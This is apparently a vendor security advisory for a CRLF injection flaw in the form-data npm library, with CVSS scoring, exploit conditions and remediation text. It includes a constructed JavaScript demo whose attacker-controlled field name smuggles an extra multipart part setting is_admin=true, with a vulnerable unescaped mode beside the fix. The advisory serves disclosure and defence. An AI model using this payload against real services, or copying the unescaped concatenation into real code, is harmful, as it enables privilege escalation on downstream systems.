CVE-2026-12143: form-data does not escape CR/LF/quote in multipart field names and filenames (CRLF injection)
form-data is a library for creating readable multipart/form-data streams. In 2.x before 2.5.6, 3.x before 3.0.5, and 4.x before 4.0.6 (that is, through 4.0.5), the `field` argument to `FormData#append` and the `filename` option are concatenated verbatim into the `Content-Disposition` header without escaping carriage return (CR), line feed (LF), or double-quote (`"`) characters.

An application that passes attacker-controlled data as a field name or filename (for example, an API gateway that turns JSON object keys into multipart field names) lets the attacker terminate the header line and inject additional headers, or smuggle entire additional multipart parts into the request the application forwards to a backend. The attacker can thereby add or override form fields (e.g. set `is_admin=true`) as seen by the downstream parser. This is an instance of CWE-93 (CRLF injection).

The fix escapes CR, LF, and `"` as `%0D`, `%0A`, and `%22` in field names and filenames, matching the serialization browsers use per the WHATWG HTML multipart/form-data encoding algorithm. Exploitation requires the consuming application to use untrusted input as a field name or filename; applications that use only fixed, trusted field names are not affected. Fixed in 2.5.6, 3.0.5, and 4.0.6.
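The following is an added example, not form-data's own code and not taken from the advisory. It contains a minimal multipart/form-data serializer that can either concatenate field names verbatim (the behaviour the advisory describes for versions through 4.0.5) or apply the WHATWG percent-escaping the fix introduces, plus a small boundary-aware parser standing in for the backend. The API-gateway scenario, the field names, the attacker payload and the fixed boundary are all constructed for the demonstration; the smuggled-part case assumes the attacker knows the boundary, which plain header injection does not require.

```javascript
// Added example (constructed); not form-data's implementation.
const CRLF = '\r\n';
// Fixed so output is deterministic; real libraries randomize the boundary.
const BOUNDARY = '----ExampleBoundary7MA4YWxkTrZu0gW';

// Escaping applied by the fixed versions, per the WHATWG multipart/form-data
// encoding algorithm: CR -> %0D, LF -> %0A, double quote -> %22.
// Order does not matter: no replacement output contains another target char.
function escapeName(s) {
  return String(s).replace(/\r/g, '%0D').replace(/\n/g, '%0A').replace(/"/g, '%22');
}

// Serialize [{name, value, filename?}] parts into a multipart body.
// escape=false reproduces verbatim concatenation (the vulnerable behaviour);
// escape=true applies escapeName to both name and filename (the fix).
function serialize(parts, { escape, boundary = BOUNDARY }) {
  const enc = escape ? escapeName : (s) => String(s);
  let body = '';
  for (const p of parts) {
    body += '--' + boundary + CRLF;
    let disp = 'Content-Disposition: form-data; name="' + enc(p.name) + '"';
    if (p.filename !== undefined) disp += '; filename="' + enc(p.filename) + '"';
    body += disp + CRLF + CRLF + String(p.value) + CRLF;
  }
  return body + '--' + boundary + '--' + CRLF;
}

// Minimal downstream parser. Delimiters must be preceded by CRLF (RFC 2046),
// so a boundary string that merely appears inside a header value is not a
// part separator. Duplicate names: last occurrence wins (a common choice).
function parseMultipart(body, boundary = BOUNDARY) {
  const fields = {};
  const delim = CRLF + '--' + boundary;
  for (let chunk of (CRLF + body).split(delim)) {
    if (chunk === '' || chunk.startsWith('--')) continue; // preamble / closing
    if (chunk.startsWith(CRLF)) chunk = chunk.slice(CRLF.length);
    const sep = chunk.indexOf(CRLF + CRLF);
    if (sep < 0) continue;
    const headers = chunk.slice(0, sep).split(CRLF);
    const value = chunk.slice(sep + 4);
    let name = null;
    for (const h of headers) {
      // \b keeps filename="..." from matching as name="...".
      const m = /^content-disposition:.*?\bname="([^"]*)"/i.exec(h);
      if (m) name = m[1];
    }
    if (name !== null) fields[name] = value;
  }
  return fields;
}

// Constructed gateway: sets a trusted is_admin=false first, then copies the
// caller's JSON object keys straight into multipart field names.
function buildGatewayRequest(userJson, escape) {
  const parts = [{ name: 'is_admin', value: 'false' }];
  for (const [k, v] of Object.entries(userJson)) parts.push({ name: k, value: v });
  return serialize(parts, { escape });
}

// Attacker-controlled JSON key: closes the name, ends the header block, then
// starts a brand-new part named is_admin (boundary assumed known).
const ATTACKER_KEY =
  'email"' + CRLF + CRLF + 'x' + CRLF +
  '--' + BOUNDARY + CRLF +
  'Content-Disposition: form-data; name="is_admin';
const ATTACKER_JSON = { username: 'bob', [ATTACKER_KEY]: 'true' };

// What the backend sees before and after the fix.
function demo() {
  const vuln = parseMultipart(buildGatewayRequest(ATTACKER_JSON, false));
  const fixed = parseMultipart(buildGatewayRequest(ATTACKER_JSON, true));
  return { vuln, fixed };
}

console.log(JSON.stringify(demo(), null, 2));
```

Running this with `node` shows the unescaped build producing a fourth part that sets `is_admin` to `true` after the gateway's own `false`, while the escaped build leaves `is_admin=false` intact and the backend sees one oddly named field whose value is `true`. The `filename` path is identical: an attacker-supplied filename containing `"` or CRLF goes through the same `enc()` call. The parser deliberately requires CRLF before each boundary delimiter; a parser that splits on the bare boundary string could still be confused by an escaped name that happens to contain it.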
Metrics
- CVSS v4.0: 8.7
- Severity: HIGH
- Fixed in: 2.5.6, 3.0.5, 4.0.6
- Affected Products: 1
HarborGuard Analysis
Synopsis
CRLF injection in the form-data npm library affects versions through 4.0.5 across the 2.x, 3.x, and 4.x release lines. The vulnerability is reachable over the network with no authentication required; an attacker supplies malicious input as a multipart field name or filename containing unescaped CR, LF, or double-quote characters. Successful exploitation lets the attacker inject arbitrary headers or smuggle additional multipart parts into forwarded requests, allowing them to add or override form fields such as privilege flags seen by a downstream server. Patched-image rebuilds at versions 2.5.6, 3.0.5, and 4.0.6 are available on HarborGuard for environments running an affected version.
HarborGuard Coverage
Detection of CVE-2026-12143 is available across every HarborGuard environment; the CVE is ingested from upstream advisory feeds within minutes of publication and matched against all customer images, including custom-built images that bundle form-data as a transitive dependency. Any image whose dependency graph includes an affected form-data version is flagged immediately.
HarborGuard scores this finding at CVSS 8.7 (HIGH) using the published v4.0 vector and weights it further against each environment's compliance policy to determine routing priority. Triage tickets are routed to the appropriate team inbox within each customer organization based on image ownership and policy configuration.
A patched-image rebuild pinned to form-data 2.5.6, 3.0.5, or 4.0.6 (matching the affected release line) becomes available through HarborGuard the moment the fix versions are resolvable in the dependency graph. For customers who opt into auto-remediation, HarborGuard runs a rebuild, executes the regression test suite, and opens a pull request against each affected workload automatically.
Exploit Conditions
- Network reachability: Required
  The attacker must reach the application over the network and supply input that the application passes as a multipart field name or filename.
- Authentication: Not required
  No authentication is required; the attacker submits input through any unauthenticated interface that accepts field names or filenames.
- Victim interaction: Not required
  No victim interaction is needed; the attacker directly sends the crafted input to the target application.
- Attack complexity: Low
  The exploit is reliable and requires no race conditions, special memory layout, or other environmental preconditions beyond an application that passes attacker-controlled values as field names or filenames.
Blast Radius
- The attacker injects arbitrary Content-Disposition header content, effectively overriding or appending multipart form fields seen by the downstream parser.
- The attacker can smuggle entire additional multipart parts into the forwarded request, setting fields such as is_admin=true or overriding access-control parameters.
- Integrity of the downstream application's form-data processing is compromised; persisted records or access-control decisions based on those fields may be altered.
- Confidentiality and availability are not directly impacted by this vulnerability according to the CVSS vector.
How HarborGuard Handles This
Available on HarborGuard: detection is active for any image that resolves form-data below 2.5.6 (2.x), 3.0.5 (3.x), or 4.0.6 (4.x). For customers who opt into auto-remediation, HarborGuard rebuilds the image at the appropriate fix version, runs a regression test suite, and opens a pull request against affected workloads; for HIGH-severity issues, the median time from CVE publication to merged patch PR is around 90 minutes in environments with auto-remediation enabled. Where compliance policy requires manual review, the finding is routed to the designated team inbox with CVSS scoring and affected image inventory attached. Note that the vulnerability is only exploitable when the consuming application passes attacker-controlled data as a field name or filename; teams that use only fixed, trusted field names may treat this as lower priority, but upgrading is still the recommended remediation.
Affected Products
- form-data / form-data: < 2.5.6 (from 0) · < 3.0.5 (from 3.0.0) · < 4.0.6 (from 4.0.0)
- CVSS vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N